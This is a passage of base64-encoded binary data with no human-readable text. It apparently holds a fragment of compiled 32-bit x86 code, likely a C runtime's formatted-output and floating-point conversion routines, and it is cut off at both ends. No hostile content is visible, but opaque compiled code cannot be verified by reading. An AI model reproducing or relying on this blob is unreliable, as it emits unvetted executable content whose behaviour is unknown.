AAYlDIDn+dDaLUwSD7wH2xkB1CItDIDlDJH7jD74HiwuA5iB00IlMJASJBCTo9EwAAItDIIPAAYlDIDn+dcqLQwjrFWaQi1MgxgQQIItTIItDCIPCAYlTIInCg+gBiUMIhdJ+MYtLBPbFQHUIi1MgOVMkft6LA4DlIHTKiUQkBMcEJCAAAADomkwAAItTIItDCOu/ZpCNZfRbXl9dw420JgAAAACQi0MIjVD/iVMIhcAPjhf///+Jzo10JgCQidq4IAAAAOis8///i0MIjVD/iVMIhcB/54nxi3ME98aAAAAAD4Xy/v//98YAAQAAdCbGASuNeQHp5f7//412AInIuquqqqr34tHqAdHpSf3//422AAAAAInP98ZAAAAAD4S8/v//xgEgg8cB6bH+//+NtCYAAAAA996D1wD33+lc/f//jXQmADlN0A+FN/7//4t9yIX/dSCLRcyFwA+OeP///4tzBPfGwAEAAA+FPv7//+lN/v//kMYBMIPBAekF/v//jXQmAJCJ8CUABgAAPQACAAAPhSr+//+LewiNR/+JQwiF/w+OJf7//4kMJIl8JAjHRCQEMAAAAIlN1OimSwAAi03Ux0MI/////wH56f39//+NdCYAkIt9yItN0In4hf8Pj3H9///pZP///420JgAAAACNdCYAVYnlV1ZTicOD7DyDeBD9D4TLAAAAD7dQFGaF0g+EpgAAAItDEIll1IPAD8HoBMHgBOiq8P//KcSNReDHReAAAAAAjXQkEMdF5AAAAACJRCQIiVQkBIk0JOgzRQAAhcAPjssAAACNPAbrGY22AAAAAItDIIgUAYtTIIPCAYlTIDn+dDeLQwSDxgH2xEB1CItTIDlTJH7jD75W/4sL9sQgdM+JFCSJTCQE6INKAACLUyCDwgGJUyA5/nXJi2XUjWX0W15fXcONdgCJ2rguAAAA6Kzx//+NZfRbXl9dw410JgDHReAAAAAAjXXgx0XkAAAAAOhSSgAAiXQkDMdEJAgQAAAAiwCJRCQEjUXeiQQk6I1HAACFwH4xD7dV3maJUxSJQxDp8v7//420JgAAAABmkInauC4AAADoRPH//4tl1Ol5////jXQmAA+3UxTr0WaQVYnFV4nXVonOU4PsHItcJDCLSwiF9g+OjAEAADnxfBIp8YlLCHgLi0MMOcEPj4wBAADHQwj/////uf/////2QwUQdExmg3scAA+E4QAAAI1GArqrqqqq9+KJyNHqiVQkDIPqASnKg3wkDAF1G+m+AAAAjbYAAAAAg+gBidEBwYlDCA+EnAAAAIXAf+yNdCYAhe0PhfkAAACLQwT2xAEPhYwCAACoQA+F5AIAAItDCIXAfhWLUwSB4gAGAACB+gACAAAPhIACAACNaxyF9g+OxQEAAI10JgCQD7YXuDAAAACE0nQGg8cBD77CidroP/D//4PuAQ+E9gAAAPZDBRB02GaDexwAdNFpxquqqqo9VVVVVXfEidm6AQAAAIno6G7w///rtInBjbQmAAAAAI12AIXJD45Y////he0PhSgBAACLQwSpwAEAAA+EIgIAAIPpAYlLCA+EQf////bEBg+FOP///4PpAYlLCI20JgAAAACJ2rggAAAA6LTv//+LQwiNUP+JUwiFwH/nhe0PhAf///+J2rgtAAAA6JPv///pCv///422AAAAAIXJD46gAAAAg+kBi0MMOcEPjpgAAAApwYlLCIXAD441AQAAg+kBiUsIhfYPjlf////2QwUQD4RN////6Vz+//+NtCYAAAAAkItDDIXAfxn2QwUIdROD6AGJQwyDxBxbXl9dw410JgCQidjomfz//+sgjbQmAAAAAA+2F7gwAAAAhNJ0BoPHAQ++wona6Pfu//+LQwyNUP+JUwyFwH/ag8QcW15fXcNmkA+EXf///8dDCP/////pLv7//422AAAAAIPpAYlLCA+EHf////dDBAAGAAAPhOL+//+J2rgtAAAA6KPu///pGv7//422AAAAALgwAAAAidrojO7//4tDDIXAfxX2QwUIdQ+F9nUd6UP///+NtgAAAACJ2Ojp+///hfYPhGr///+LQwwB8IlDDI20JgAAAABmkInauDAAAADoRO7//4PGAXXv6UP///+NtCYAAAAAjXYAi0ME9sQID4W//v//hfYPjiT+///2xBAPhBv+//9mg3scAA+EEP7//+ki/f//jXYAidq4KwAAAOj07f//6Wv9//+NtCYAAAAAg+gBiUMIZpCJ2rgwAAAA6NTt//+LQwiNUP+JUwiFwH/n6Vr9//9mkPbEBg+FIv3//4tTCI1K/4lLCIXSD44R/f//6eH9//+Qidq4IAAAAOiU7f//6Qv9//+NtCYAAAAAjbQmAAAAAJBVV4nXVlONWf+5Z2ZmZoPsTIl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